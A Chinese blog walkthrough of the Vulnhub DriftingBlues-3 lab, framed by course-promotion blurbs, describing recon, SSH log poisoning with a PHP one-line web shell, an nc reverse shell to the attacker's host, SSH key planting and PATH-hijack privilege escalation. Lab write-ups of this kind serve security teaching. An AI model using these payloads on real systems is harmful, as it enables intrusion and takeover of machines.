看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_[vulnhub靶机] driftingblues 3(1)

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.205.133 靶机IP :192.168.205.138

使用命令:nmap -sS -A -T4 -n 192.168.205.138

在这里插入图片描述
这里开启了22端口和80端口 dirb 扫一下 发现了robotos.txt 发现了/eventadmins继续访问然我们检测/littlequeenofspades.html
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现好像是一串个歌词 但是好像没啥用 F12查看源代码 哦呦!!发现是一串base64(开心坏了)直接解码

base64:http://www.jsons.cn/base64

aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

在这里插入图片描述

在这里插入图片描述
最终得到了 /adminsfixit.php 继续访问 发现是ssh 日志记录 可以尝试往日志文件写入一句话后门
在这里插入图片描述
在这里插入图片描述

②:反弹shell:

看到出现ssh auth log --> ssh身份验证日志,并且注意到登录用户名显示在日志中,也就是说如果我们使用ssh登陆时,将用户名写成一句话就可以写马进日志中

使用命令:ssh '<?php system($_GET["a"]);?>'@192.168.205.138

在这里插入图片描述

http://192.168.205.138/adminsfixit.php?a=ls #执行成功

使用nc回弹shell

kali开启监听:nc -lvnp 4444
?xa=nc -e /bin/bash 192.168.205.133 4444
python -c 'import pty; pty.spawn("/bin/bash")' #交互shell

在这里插入图片描述
进入home下 发现robertj用户 然后进去 查看隐藏文件 ls-al 发现 .ssh文件
在这里插入图片描述

直接在目标机生成一个公钥:ssh-keygen -t rsa
将生成的私钥保存到:/home/robertj/.ssh/id_rsa 
将 SSH 公钥文件重命名为 authorized_keys ,用于 SSH 登陆认证
cat id_rsa.pub > authorized_keys
然后将私钥复制到本机

在这里插入图片描述
在这里插入图片描述
然后把这ssh 私钥复制到桌面 因为我这里输入了密码:123456 所以等下也要输入!!!

③:ssh私钥登入:

赋予权限:chmod 400 id_rsa
使用命令:ssh robertj@192.168.205.138 -i id_rsa
在这里插入图片描述

④:命令劫持提权:

使用命令:find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
在这里插入图片描述

大概的原理就是 执行系统命令所以我们可以自行编写一个同名文件,
比如说cat,因为我们猜测getinfo中使用了cat命令,如若我们可以添加环境变量,getinfo在调用命令时首先检索环境变量就会调用到我们伪造的cat,执行我们想要的命令,来达到提权的效果,即使用环境变量进行命令劫持提权



![img](https://img-blog.csdnimg.cn/img_convert/9600a472a5fe89b957cf1b77c71e7e6a.png)
![img](https://img-blog.csdnimg.cn/img_convert/271c06491231bed9b8a7fddcac85793c.png)
![img](https://img-blog.csdnimg.cn/img_convert/030000a066e6c67e4ecbbbdd75f8b90d.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值